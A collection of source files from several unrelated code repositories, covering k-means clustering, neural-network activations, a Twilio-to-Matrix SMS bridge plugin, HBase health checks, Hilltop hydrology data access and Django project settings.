for i in range(1, self.n_clusters):
x_k = range(self.n_samples)
p_k = np.square(np.min([self._calculate_distances(X, center) for center in self.cluster_centers], axis=0))
p_k = p_k / np.sum(p_k)
c_k = stats.rv_discrete(values=(x_k, p_k)).rvs(size=1)
self.cluster_centers.append(X[c_k])
self.cluster_centers = np.array(self.cluster_centers)
def _assign_data(self, X):
distances = []
for cluster_center in self.cluster_centers:
distances.append(self._calculate_distances(X, cluster_center))
distances = np.array(distances)
return np.argmin(distances, axis=0)
def _calculate_distances(self, X, point):
return np.sqrt(np.sum(np.square(point - X[:, ]), axis=1))
def _calculate_inertia(self, X):
labels = self._assign_data((X))
points = self.cluster_centers[labels]
self.inertia = np.sum(self._calculate_distances(X, self.cluster_centers[labels]))
def _calculate_centers(self, X, labels):
centers = []
for cluster in range(self.n_clusters):
center = np.average(X[labels == cluster], axis=0)
if np.sum(np.isfinite(center)==False) != 0:
center = self.cluster_centers[cluster]
centers.append(center)
self.cluster_centers = np.array(centers)
def fit(self, X):
self._check_data(X)
self._init_clusters(X)
for i in range(self.max_iter):
idx = self._assign_data(X)
self._calculate_centers(X, idx)
self._calculate_inertia(X)
```
#### File: MachineLearningLibrary/NeuralNetworks/NeuralNetworkUtilities.py
```python
import numpy as np
def identity(z):
"""Identity function...
Args:
z (np.array)
Returns:
f(z) = z (np.array)
"""
return z
def dfdz_identity(z):
"""Derivative of the Identity function...
Args:
z (np.array)
Returns:
df(z)/dz = 1.0 (np.array)
"""
return np.ones_like(z)
def sigmoid(z):
"""Sigmoid function...
Args:
z (np.array)
Returns:
f(z) = 1 / (1 + exp(-z)) (np.array)
"""
return 1.0 / (1.0 + np.exp(-z))
def dfdz_sigmoid(z):
"""Derivative of the Sigmoid function...
Args:
z (np.array)
Returns:
df(z)/dz = f(z) * (1 - f(z)) (np.array)
"""
return sigmoid(z) * (1.0 - sigmoid(z))
def logistic(z):
"""Logistic function...
Args:
z (np.array)
Returns:
f(z) = 1 / (1 + exp(-z)) (np.array)
"""
return sigmoid(z)
def dfdz_logistic(z):
"""Derivative of the Logistic function...
Args:
z (np.array)
Returns:
df(z)/dz = f(z) * (1 - f(z)) (np.array)
"""
return sigmoid(z) * (1.0 - sigmoid(z))
def tanh(z):
"""Hyperbolic tangent function...
Args:
z (np.array)
Returns:
f(z) = 2.0 / (1.0 + np.exp(-2.0 * z)) - 1.0 (np.array)
"""
return 2.0 / (1.0 + np.exp(-2.0 * z)) - 1.0
def dfdz_tanh(z):
"""Derivative of the hyperbolic tangent function...
Args:
z (np.array)
Returns:
df(z)/dz = 1.0 - np.square(tanh(z)) (np.array)
"""
return 1.0 - np.square(tanh(z))
def softsign(z):
"""Softsign function...
Args:
z (np.array)
Returns:
f(z) = z / (1.0 + np.abs(z)) (np.array)
"""
return z / (1.0 + np.abs(z))
def dfdz_softsign(z):
"""Derivative of the softsign function...
Args:
z (np.array)
Returns:
df(z)/dz = None (np.array)
"""
raise RuntimeError('not implemented...')
def ReLU(z):
"""Rectified linear unit function...
Args:
z (np.array)
Returns:
f(z) = np.max(0, z) (np.array)
"""
return z * (z > 0)
def dfdz_ReLU(z):
"""Derivative of the rectified linear unit function...
Args:
z (np.array)
Returns:
df(z)/dz = 1 if x > 0 else 0 (np.array)
"""
return (z > 0)
def LReLU(z):
"""Leaky rectified linear unit function...
Args:
z (np.array)
Returns:
f(z) = z if z > 0 else 0.01 * z (np.array)
"""
return PReLU(z, 0.01)
def dfdz_LReLU(z):
"""Derivative of the leaky rectified linear unit function...
Args:
z (np.array)
Returns:
df(z)/dz = 1 if x > 0 else 0.01 (np.array)
"""
return dfdz_PReLU(z, 0.01)
def PReLU(z, alpha):
"""Parametric rectified linear unit function...
Args:
z (np.array)
Returns:
f(z) = z if z > 0 else alpha * z (np.array)
"""
return z * (z > 0) + alpha * z * (z <= 0)
def dfdz_PReLU(z, alpha):
"""Derivative of the parametric rectified linear unit function...
Args:
z (np.array)
Returns:
df(z)/dz = 1 if x > 0 else alpha (np.array)
"""
return 1.0 * (z > 0) + alpha * (z <= 0)
```
|
{
"source": "jeffcarter-github/TensorFlow_MD",
"score": 3
}
|
#### File: TensorFlow_MD/Ensembles/Ensemble.py
```python
import numpy as np
import constants
class BaseEnsemble(object):
def __init__(self, dt=None):
self.dt = dt
self.atom_coords = None
self.md_integrator = None
def set_timestep(self, dt):
''''''
self.dt = dt
def create_atoms(self, )
class NVT(BaseEnsemble):
'''Canonical Ensemble (NVT) Simulation Class
Attributes:
dt (float): time step for EOM integration in picoseconds
atom_coords: (tf.array) ...
md_integrator: (object): alogrithm for EOM integration
temperature (float): temperature in Kelvin
thermostat (object): thermostat instance
'''
def __init__(self):
self.temperature = None
def set_temperature(self, temperature):
'''Set the system temperature
Args:
temperature (float): in Kelvin'''
self.temperature = temperature
def set_thermostat(self, thermostat):
'''Set the alorithm for temperature control
Args:
thermostat (object): instance of thermostat class'''
self.thermostat = thermostat
class NVE(BaseEnsemble):
def __init__(self):
pass
class NPT(BaseEnsemble):
def _init__(self):
pass
```
|
{
"source": "jeffcasavant/MaubotTwilio",
"score": 2
}
|
#### File: MaubotTwilio/twilio_plugin/migrations.py
```python
from sqlalchemy import select
from sqlalchemy.engine.base import Engine
from alembic.migration import MigrationContext
from alembic.operations import Operations
def run(engine: Engine):
conn = engine.connect()
ctx = MigrationContext.configure(conn)
op = Operations(ctx)
```
#### File: MaubotTwilio/twilio_plugin/plugin.py
```python
from typing import Type
from aiohttp import web
from maubot import Plugin, MessageEvent
from maubot.handlers import command, event, web as web_handler
from mautrix.types import EventType, TextMessageEventContent, MessageType, Format
from mautrix.util.config import BaseProxyConfig, ConfigUpdateHelper
from twilio.rest import Client
from twilio.base.exceptions import TwilioRestException
from .db import Database
PREFIX = "<sms>"
class Config(BaseProxyConfig):
def do_update(self, helper: ConfigUpdateHelper) -> None:
helper.copy("twilio_account_sid")
helper.copy("twilio_auth_token")
helper.copy("twilio_source_number")
helper.copy("admins")
class WebhookReceiver:
def __init__(self, db, log, client):
self.db = db # pylint: disable=invalid-name
self.log = log
self.client = client
@web_handler.post("/sms")
async def handle_sms(self, request: web.Request) -> web.Response:
params = await request.post()
number = params["From"]
body = params["Body"]
self.log.debug("Received sms from %s: %s", number, body)
row = self.db.get(number=number)
if not row:
self.log.info("No room mapping for %s", number)
else:
row = row[0]
content = TextMessageEventContent(msgtype=MessageType.TEXT, body=f"{PREFIX} {row.name}: {body}")
await self.client.send_message(row.room, content)
return web.Response(status=200)
class TwilioPlugin(Plugin):
db: Database
async def start(self) -> None:
# pylint: disable=attribute-defined-outside-init
await super().start()
self.config.load_and_update()
self.db = Database(self.log, self.database) # pylint: disable=invalid-name
self.log.debug("Logging in to twilio")
self.twilio_client = Client(self.config["twilio_account_sid"], self.config["twilio_auth_token"])
self.webhook_receiver = WebhookReceiver(self.db, self.log, self.client)
self.register_handler_class(self.webhook_receiver)
@classmethod
def get_config_class(cls) -> Type[BaseProxyConfig]:
return Config
@event.on(EventType.ROOM_MESSAGE)
async def handler(self, evt: MessageEvent) -> None:
content = evt.content
if not content.msgtype.is_text or content.body.startswith("!") or content.body.startswith(PREFIX):
return
self.log.debug("Twilio bot handling message in %s: %s", evt.room_id, content.body)
numbers = self.db.get(room=evt.room_id)
self.log.debug("DB resp %s", numbers)
self.log.info("Forwarding message to %d numbers", len(numbers))
for number in numbers:
self.log.debug("Sending message to %s (%s)", number.name, number.number)
try:
self.twilio_client.messages.create(
to=number.number, from_=self.config["twilio_source_number"], body=f"{evt.sender}: {content.body}"
)
except TwilioRestException:
self.log.exception("Failed to send to %s (%s)", number.name, number.number)
await evt.mark_read()
@command.new("removesms", help="Remove an SMS correspondent from this room")
@command.argument("identifier", required=True)
async def removesms_handler(self, evt: MessageEvent, identifier: str) -> None:
if evt.sender not in self.config.get("admins", []):
content = TextMessageEventContent(
msgtype=MessageType.TEXT, body="You are not authorized to configure this plugin"
)
await self.client.send_message(evt.room_id, content)
return
self.log.info("Removing SMS correspondent %s for room %s", identifier, evt.room_id)
await evt.mark_read()
self.db.unmap(identifier=identifier)
content = TextMessageEventContent(msgtype=MessageType.TEXT, body=f"Removed {identifier}")
await self.client.send_message(evt.room_id, content)
@command.new("addsms", help="Add an SMS correspondent to this room")
@command.argument("alias", required=True)
@command.argument("number", required=True)
async def addsms_handler(self, evt: MessageEvent, alias: str, number: str) -> None:
if evt.sender not in self.config.get("admins", []):
content = TextMessageEventContent(
msgtype=MessageType.TEXT, body="You are not authorized to configure this plugin"
)
await self.client.send_message(evt.room_id, content)
return
self.log.info("Registering new SMS correspondent %s (%s) for room %s", alias, number, evt.room_id)
self.db.map(name=alias, number=number, room=evt.room_id)
await evt.mark_read()
content = TextMessageEventContent(msgtype=MessageType.TEXT, body=f"Added {alias} ({number})")
await self.client.send_message(evt.room_id, content)
@command.new("listsms", help="List all SMS correspondents in this room")
async def listsms_handler(self, evt: MessageEvent) -> None:
self.log.info("Listing SMS correspondents for room %s", evt.room_id)
await evt.mark_read()
members = [{"name": row.name, "number": row.number} for row in self.db.list(room=evt.room_id)]
plain_members = "\n".join([f"{member['name']}: {member['number']}" for member in members])
html_members = "\n".join(
[f"<tr><td>{member['name']}</td><td>{member['number']}</td></tr>" for member in members]
)
header = "Current SMS participants:"
formatted_body = f"{header}\n<table>\n{html_members}\n</table>"
content = TextMessageEventContent(
msgtype=MessageType.TEXT,
format=Format.HTML,
body=f"{header}\n{plain_members}",
formatted_body=formatted_body,
)
await self.client.send_message(evt.room_id, content)
```
|
{
"source": "jeffcasavant/vyper",
"score": 3
}
|
#### File: vyper/vyper/util.py
```python
import logging
import os
import pathlib
import toml
import yaml
try:
import ujson as json
except ImportError:
import json
try:
FileNotFoundError
except NameError:
FileNotFoundError = OSError
log = logging.getLogger("vyper.util")
class ConfigParserError(Exception):
"""Denotes failing to parse configuration file."""
def __init__(self, message, *args):
self.message = message
super(ConfigParserError, self).__init__(message, *args)
def __str__(self):
return "While parsing config: {0}".format(self.message)
def abs_pathify(in_path):
log.info("Trying to resolve absolute path to {0}".format(in_path))
try:
return pathlib.Path(in_path).resolve()
except FileNotFoundError as e:
log.error('Couldn"t discover absolute path: {0}'.format(e))
return ""
def exists(path):
try:
os.stat(str(path))
return True
except FileNotFoundError:
return False
def unmarshall_config_reader(r, d, config_type):
config_type = config_type.lower()
if config_type in ["yaml", "yml"]:
try:
f = yaml.safe_load(r)
try:
d.update(yaml.safe_load(f))
except AttributeError: # to read files
d.update(f)
except Exception as e:
raise ConfigParserError(e)
elif config_type == "json":
try:
f = json.loads(r)
d.update(f)
except Exception as e:
raise ConfigParserError(e)
elif config_type == "toml":
try:
try:
d.update(toml.loads(r))
except TypeError: # to read files
try:
d.update(toml.load(r))
except TypeError: # to read streams
d.update(r)
except Exception as e:
raise ConfigParserError(e)
return d
```
|
{
"source": "jeffchen81/hbase-calltest-webapp",
"score": 2
}
|
#### File: jeffchen81/hbase-calltest-webapp/hbase_calltest.py
```python
import hbase
import sys
import time
import pytz
from es_utils import EsUtils
from datetime import datetime, timedelta
# HBase建表模型
HBASE_NS = 'calltest'
HBASE_CF = 'heartbeat'
class HbaseCalltest(object):
'''HBase拨测工具类'''
def __init__(self, zk_conf='0.0.0.0:2181', *args, **kwargs):
self._zk_conf = zk_conf
self._conn = None
self._es_utils = None
@property
def zk_conf(self):
return self._zk_conf
@zk_conf.setter
def zk_conf(self, zk_conf):
self._zk_conf = zk_conf
@property
def es_utils(self):
return self._es_utils
@es_utils.setter
def es_utils(self, es_utils):
if isinstance(es_utils, EsUtils):
self._es_utils = es_utils
else:
raise TypeError('es_utils类型异常')
def get_conn(self):
'''获取hbase连接'''
if self._conn is None:
self._conn = hbase.ConnectionPool(self._zk_conf).connect()
return self._conn
def conn_close(self):
'''关闭hbase连接'''
if self._conn:
self._conn.close()
pass
def run_task(self):
'''运行拨测任务:读后,NO+1写'''
last_cf_no = 0
last_write_time = 0
try:
table = self.get_conn()[HBASE_NS][HBASE_CF]
# 只扫描最近10条
for row in table.scan(batch_size=10):
# print(row)
last_cf_no = int(str(row['cf:no'], encoding='utf-8'))
last_write_time = sys.maxsize - int(row.key)
break
curr_cf_no = last_cf_no + 1
self.write_new_row(cf_no=curr_cf_no, table=table)
self.send_metric(curr_cf_no=curr_cf_no, last_write_time=last_write_time)
except Exception as e:
raise RuntimeError("run_task异常:" + str(e))
def write_new_row(self, cf_no, table):
'''生成新记录,在原no上+1'''
curr_rowkey = generate_rowkey()
table.put(hbase.Row(
str(curr_rowkey), {
'cf:no': str(cf_no).encode()
}
))
def send_metric(self, curr_cf_no, last_write_time):
'''发送指标'''
if self._es_utils:
self._es_utils.write(get_es_doc(
cf_no=curr_cf_no,
last_write_time=last_write_time
))
pass
def get_es_doc(cf_no, last_write_time):
'''生成写入es的doc
:param cf_no: 当前自增序号
:param last_write_time: 上一次写入HBASE的时间戳
'''
# 当前写入时间
ct = time.time()
# 以东八区写入
t = datetime.fromtimestamp(round(ct, 3), pytz.timezone(
'Asia/Shanghai')).strftime('%Y-%m-%dT%H:%M:%S.%f%z')
# 响应时间 = 当前时间 - 上次写入时间
rt = int(ct) - int(last_write_time)
doc = {
'last_write_time': datetime.fromtimestamp(int(last_write_time)),
'no': int(cf_no),
'response_time': rt,
'timestamp': t
}
return doc
def generate_rowkey():
'''生成唯一rowkey:最大Long-当前时间戳'''
now_timestamp = int(time.time())
return sys.maxsize - now_timestamp
if __name__ == '__main__':
demo = HbaseCalltest(zk_conf='0.0.0.0:2181')
demo.es_utils = EsUtils(es_list=['0.0.0.0:9200'])
demo.run_task()
demo.conn_close()
```
|
{
"source": "jeffchen81/stock-starer",
"score": 3
}
|
#### File: jeffchen81/stock-starer/main.py
```python
from bottle import route, run, template
@route('/hello/<name>')
def index(name):
return template('<b>Hello {{name}}</b>!', name=name)
run(host='localhost', port=8080)
# def main():
# '''
# 主函数
# '''
# pass
# if __name__ == "__main__":
# main()
```
|
{
"source": "jeffcnz/hilltop-py",
"score": 3
}
|
#### File: hilltop-py/hilltoppy/com.py
```python
try:
from win32com.client import Dispatch, pywintypes, makepy
except:
print('Install pywin32 or com functions will not work')
from pandas import concat, to_datetime, to_numeric, DataFrame, merge
from hilltoppy.util import pytime_to_datetime, time_switch
######################################################
#### COM access method
def makepy_hilltop(hlib='Hilltop Data Access'):
"""
Function to generate the Hilltop COM module.
Parameters
----------
hlib : str
The name of the COM library.
Returns
-------
None
"""
makepy.GenerateFromTypeLibSpec(hlib, verboseLevel=1)
def measurement_list(hts, sites=None, mtypes=None, rem_wq_sample=True):
"""
Function to read the site names, measurement types, and units of a Hilltop hts file. Returns a DataFrame.
Parameters
----------
hts : str
Path to the hts file.
sites : list or None
A list of site names within the hts file.
mtypes : list or None
A list of measurement types that should be returned.
rem_wq_sample : bool
In Hilltop 'WQ Sample' is a measurement type placemarker for the additional sample data. It doesn't generally apply when querying for the combo of sites/measurement types. True removes this instance from the returned DataFrame.
Returns
-------
DataFrame
"""
cat = Dispatch("Hilltop.Catalogue")
if not cat.Open(hts):
raise ValueError(cat.errmsg)
dfile = Dispatch("Hilltop.DataRetrieval")
try:
dfile.Open(hts)
except ValueError:
print(dfile.errmsg)
sites_lst = []
### Iterate through all sites/datasources/mtypes
cat.StartSiteEnum
while cat.GetNextSite:
site_name = str(cat.SiteName.encode('ascii', 'ignore').decode())
if sites is None:
pass
elif site_name in sites:
pass
else:
continue
while cat.GetNextDataSource:
ds_name = str(cat.DataSource.encode('ascii', 'ignore').decode())
try:
start1 = pytime_to_datetime(cat.DataStartTime)
end1 = pytime_to_datetime(cat.DataEndTime)
except ValueError:
bool_site = dfile.FromSite(site_name, ds_name, 1)
if bool_site:
start1 = pytime_to_datetime(cat.DataStartTime)
end1 = pytime_to_datetime(cat.DataEndTime)
else:
print('No site data for ' + site_name + '...for some reason...')
while cat.GetNextMeasurement:
mtype1 = str(cat.Measurement.encode('ascii', 'ignore').decode())
if mtype1 == 'Item2':
continue
elif mtypes is None:
pass
elif mtype1 in mtypes:
pass
else:
continue
divisor = cat.Divisor
unit1 = str(cat.Units.encode('ascii', 'ignore').decode())
if unit1 == '%':
# print('Site ' + name1 + ' has no units')
unit1 = ''
sites_lst.append([site_name, ds_name, mtype1, unit1, divisor, str(start1), str(end1)])
sites_df = DataFrame(sites_lst, columns=['site', 'data_source', 'mtype', 'unit', 'divisor', 'start_date', 'end_date'])
if rem_wq_sample:
sites_df = sites_df[~(sites_df.mtype == 'WQ Sample')]
dfile.Close()
cat.Close()
return sites_df
def get_data_quantity(hts, sites=None, mtypes=None, start=None, end=None, agg_period=None, agg_n=1, fun=None, output_site_data=False, exclude_mtype=None, sites_df=None):
"""
Function to read water quantity data from an hts file.
Parameters
----------
hts : str
Path to the hts file.
sites : list
A list of site names within the hts file.
mtypes : list
A list of measurement types that should be returned.
start : str
The start date to retreive from the data in ISO format (e.g. '2011-11-30 00:00').
end : str
The end date to retreive from the data in ISO format (e.g. '2011-11-30 00:00').
agg_period : str
The resample period (e.g. 'day', 'month').
agg_n : int
The number of periods (e.g. 1 for 1 day).
fun : str
The resampling function.
output_site_data : bool
Should the sites data be output?
sites_df : DataFrame
The DataFrame return from the rd_hilltop_sites function. If this is passed than rd_hilltop_sites is not run.
Returns
-------
DataFrame
"""
agg_name_dict = {'sum': 4, 'count': 5, 'mean': 1}
agg_unit_dict = {'l/s': 1, 'm3/s': 1, 'm3/hour': 1, 'mm': 1, 'm3': 4}
unit_convert = {'l/s': 0.001, 'm3/s': 1, 'm3/hour': 1, 'mm': 1, 'm3': 1}
### First read all of the sites in the hts file and select the ones to be read
if not isinstance(sites_df, DataFrame):
sites_df = measurement_list(hts, sites=sites, mtypes=mtypes)
sites_df = sites_df[sites_df.unit.isin(list(agg_unit_dict.keys()))]
if isinstance(exclude_mtype, list):
sites_df = sites_df[~sites_df.mtype.isin(exclude_mtype)]
### Select out the sites/mtypes within the date range
if isinstance(start, str):
sites_df = sites_df[sites_df.end_date >= start]
if isinstance(end, str):
sites_df = sites_df[sites_df.start_date <= end]
### Open the hts file
dfile = Dispatch("Hilltop.DataRetrieval")
try:
dfile.Open(hts)
except ValueError:
print(dfile.errmsg)
### Iterate through he hts file
df_lst = []
for i in sites_df.index:
site = sites_df.loc[i, 'site']
mtype = sites_df.loc[i, 'mtype']
unit = sites_df.loc[i, 'unit']
if fun is None:
agg_val = agg_unit_dict[unit]
else:
agg_val = agg_name_dict[fun]
if dfile.FromSite(site, mtype, 1):
## Set up start and end times and aggregation initiation
start_time = pytime_to_datetime(dfile.DataStartTime)
end_time = pytime_to_datetime(dfile.DataEndTime)
if (start_time.year < 1900) | (end_time.year < 1900):
print('Site ' + site + ' has a start or end time prior to 1900')
continue
if (start is None):
if (agg_period is not None):
start1 = str(to_datetime(start_time).ceil(str(agg_n) + time_switch(agg_period)))
else:
start1 = dfile.DataStartTime
else:
start1 = start
if end is None:
end1 = dfile.DataEndTime
else:
end1 = end
if not dfile.FromTimeRange(start1, end1):
continue
if (agg_period is not None):
dfile.SetMode(agg_val, str(agg_n) + ' ' + agg_period)
## Extract data
data = []
time = []
if dfile.getsinglevbs == 0:
t1 = dfile.value
if isinstance(t1, str):
print('site ' + site + ' has nonsense data')
else:
data.append(t1)
time.append(str(pytime_to_datetime(dfile.time)))
while dfile.getsinglevbs != 2:
data.append(dfile.value)
time.append(str(pytime_to_datetime(dfile.time)))
if data:
df_temp = DataFrame({'time': time, 'data': data, 'site': site, 'mtype': mtype})
df_lst.append(df_temp)
dfile.Close()
if df_lst:
df1 = concat(df_lst)
df1.loc[:, 'time'] = to_datetime(df1.loc[:, 'time'])
df2 = df1.set_index(['mtype', 'site', 'time']).data * unit_convert[unit]
else:
df2 = DataFrame([], index=['mtype', 'site', 'time'])
if output_site_data:
return df2, sites_df
else:
return df2
def get_data_quality(hts, sites=None, mtypes=None, start=None, end=None, dtl_method=None, output_site_data=False, mtype_params=None, sample_params=None, sites_df=None):
"""
Function to read water quality data from an hts file.
Parameters
----------
hts : str
Path to the hts file.
sites : list
A list of site names within the hts file.
mtypes : list
A list of measurement types that should be returned.
start : str
The start date to retreive from the data in ISO format (e.g. '2011-11-30 00:00').
end : str
The end date to retreive from the data in ISO format (e.g. '2011-11-30 00:00').
dtl_method : None, 'standard', 'trend'
The method to use to convert values under a detection limit to numeric. None does no conversion. 'standard' takes half of the detection limit. 'trend' is meant as an output for trend analysis with includes an additional column dtl_ratio referring to the ratio of values under the detection limit.
output_site_data : bool
Should the site data be output?
sites_df : DataFrame
The DataFrame return from the rd_hilltop_sites function. If this is passed than rd_hilltop_sites is not run.
Returns
-------
DataFrame
"""
### First read all of the sites in the hts file and select the ones to be read
if not isinstance(sites_df, DataFrame):
sites_df = measurement_list(hts, sites=sites, mtypes=mtypes, rem_wq_sample=False)
### Select out the sites/mtypes within the date range
if isinstance(start, str):
sites_df = sites_df[sites_df.end_date >= start]
if isinstance(end, str):
sites_df = sites_df[sites_df.start_date <= end]
### Open the hts file
wqr = Dispatch("Hilltop.WQRetrieval")
dfile = Dispatch("Hilltop.DataFile")
try:
dfile.Open(hts)
except ValueError:
print(dfile.errmsg)
### Iterate through he hts file
df_lst = []
for i in sites_df.index:
site_data = sites_df.loc[i]
site = site_data['site']
mtype = site_data['mtype']
if mtype == 'WQ Sample':
continue
wqr = dfile.FromWQSite(site, mtype)
## Set up start and end times and aggregation initiation
if start is None:
start1 = wqr.DataStartTime
else:
start1 = pywintypes.TimeType.strptime(start, '%Y-%m-%d')
if end is None:
end1 = wqr.DataEndTime
else:
end1 = pywintypes.TimeType.strptime(end, '%Y-%m-%d')
if not wqr.FromTimeRange(start1, end1):
continue
## Extract data
data = []
time = []
sample_p = []
test_params = sites_df[sites_df.site == site].mtype.unique()
if ('WQ Sample' in test_params) & (isinstance(mtype_params, list) | isinstance(sample_params, list)):
mtype_p = []
while wqr.GetNext:
data.append(str(wqr.value.encode('ascii', 'ignore').decode()))
time.append(str(pytime_to_datetime(wqr.time)))
sample_p.append({sp: str(wqr.params(sp).encode('ascii', 'ignore').decode()) for sp in sample_params})
mtype_p.append({mp: str(wqr.params(mp).encode('ascii', 'ignore').decode()) for mp in mtype_params})
else:
while wqr.GetNext:
data.append(str(wqr.value.encode('ascii', 'ignore').decode()))
time.append(str(pytime_to_datetime(wqr.time)))
if data:
df_temp = DataFrame({'time': time, 'data': data, 'site': site, 'mtype': mtype})
if sample_p:
df_temp = concat([df_temp, DataFrame(sample_p), DataFrame(mtype_p)], axis=1)
df_lst.append(df_temp)
dfile.Close()
wqr.close()
if df_lst:
data = concat(df_lst)
data.loc[:, 'time'] = to_datetime(data.loc[:, 'time'])
data1 = to_numeric(data.loc[:, 'data'], errors='coerce')
data.loc[data1.notnull(), 'data'] = data1[data1.notnull()]
data = data.reset_index(drop=True)
#### Convert detection limit values
if dtl_method is not None:
less1 = data['data'].str.match('<')
if less1.sum() > 0:
less1.loc[less1.isnull()] = False
data2 = data.copy()
data2.loc[less1, 'data'] = to_numeric(data.loc[less1, 'data'].str.replace('<', ''), errors='coerce') * 0.5
if dtl_method == 'standard':
data3 = data2
if dtl_method == 'trend':
df1 = data2.loc[less1]
count1 = data.groupby('mtype')['data'].count()
count1.name = 'tot_count'
count_dtl = df1.groupby('mtype')['data'].count()
count_dtl.name = 'dtl_count'
count_dtl_val = df1.groupby('mtype')['data'].nunique()
count_dtl_val.name = 'dtl_val_count'
combo1 = concat([count1, count_dtl, count_dtl_val], axis=1, join='inner')
combo1['dtl_ratio'] = (combo1['dtl_count'] / combo1['tot_count']).round(2)
## conditionals
param2 = combo1[(combo1['dtl_ratio'] > 0.4) & (combo1['dtl_val_count'] != 1)]
over_40 = data['mtype'].isin(param2.index)
## Calc detection limit values
data3 = merge(data, combo1['dtl_ratio'].reset_index(), on='mtype', how='left')
data3.loc[:, 'data_dtl'] = data2['data']
max_dtl_val = data2[over_40 & less1].groupby('mtype')['data'].transform('max')
max_dtl_val.name = 'dtl_data_max'
data3.loc[over_40 & less1, 'data_dtl'] = max_dtl_val
else:
data3 = data
else:
data3 = data
if output_site_data:
sites_df = sites_df[~(sites_df.mtype == 'WQ Sample')]
return data3, sites_df
else:
return data3
def write_wq_data(hts, data):
"""
Function to write water quality data to Hilltop hts files.
Parameters
------------
hts : str
Path to the hts file to write to.
data : dict
A dictionary of the data in the following example structure
{'SQ00001': {'2000-01-01 12:00:00': {'SiteParameter':
{'Sample ID': '174759302',
'Project': 'BPStreams'
}
'Measurement':
{'Conductivity (Field)':
{'Value': '18.59',
'MethodText': 'Unknown meter',
'Lab': 'Field'
}
}
}
}
}
Returns
-------
None
"""
for s in data:
print(s)
dfile = Dispatch("Hilltop.WQInput")
try:
dfile.Open(hts)
except ValueError:
print(dfile.ErrorMsg)
for d in data[s]:
# print(d)
q1 = data[s][d]
dfile.PutSample(s, d) # Initialize the site and time
if 'SiteParameter' in q1:
sp4 = q1['SiteParameter']
for key, val in sp4.items():
dfile.SetParam(key, val) # set the sample paremters, not associated with measurement types
if 'Measurement' in q1:
m1 = q1['Measurement']
for key, val in m1.items():
dup = val.copy()
dfile.PutMeasurement(key, dup.pop('Value')) # Set a measurement value
if dup:
for mp, mpval in dup.items():
dfile.SetParam(mp, mpval) # sample parameters associated with the measurement parameter
if len(dfile.ErrorMsg) > 0:
raise ValueError(dfile.ErrorMsg)
else:
dfile.Close() # commit data to the hts file
```
|
{
"source": "jeffcnz/mon-site-register",
"score": 2
}
|
#### File: mon-site-register/mon-site-register/settings.py
```python
import json
import os
from django.core.exceptions import ImproperlyConfigured
#import dj_database_url
import django_heroku
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Import 'secret' info
if (os.path.isfile(os.path.join(BASE_DIR, 'secrets.json'))):
with open(os.path.join(BASE_DIR, 'secrets.json')) as secrets_file:
secrets = json.load(secrets_file)
else:
secrets = {
"SECRET_KEY": "default",
"USER": "user",
"DB_PASSWORD": "<PASSWORD>"
}
def get_secret(setting, secrets=secrets):
"""Get secret setting or fail with ImproperlyConfigured"""
try:
return secrets[setting]
except KeyError:
raise ImproperlyConfigured("Set the {} setting".format(setting))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
ALLOWED_HOSTS = []
APPEND_SLASH = False
# Application definition
INSTALLED_APPS = [
#'sites.apps.SitesConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.gis',
'sites',
'leaflet',
'guardian',
'rest_framework',
'rest_framework_gis',
#'nested_admin'
#'multiforloop'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'sites.middleware.timezone.TimezoneMiddleware'
]
ROOT_URLCONF = 'mon-site-register.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mon-site-register.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
# Set database depending whether local or on Heroku
if os.environ.get('ENV') == 'HEROKU':
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.postgis',
'NAME': 'postgis'
}
}
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
else:
DATABASES = {
'default': {
# Initial SQLite database
#'ENGINE': 'django.db.backends.sqlite3',
#'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# Updated to PostGIS
'ENGINE': 'django.contrib.gis.db.backends.postgis',
'NAME': 'gisdb',
'USER': get_secret('USER'),
'PASSWORD': get_secret('DB_PASSWORD'),
'HOST':'localhost',
'PORT':'5433',
}
}
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = get_secret('SECRET_KEY')
DEBUG = True
#DATABASES['default'] = dj_database_url.config()
#DATABASES['default']['ENGINE'] = 'django.contrib.gis.db.backends.postgis'
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Etc/GMT-12' #'Pacific/Auckland'
DATE_FORMAT = 'd m Y'
DATETIME_FORMAT = 'd m Y H:i:s'
USE_I18N = True
# Use Local date formatting False so can set format
USE_L10N = False
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
# For Heroku
GDAL_LIBRARY_PATH = os.environ.get('GDAL_LIBRARY_PATH')
GEOS_LIBRARY_PATH = os.environ.get('GEOS_LIBRARY_PATH')
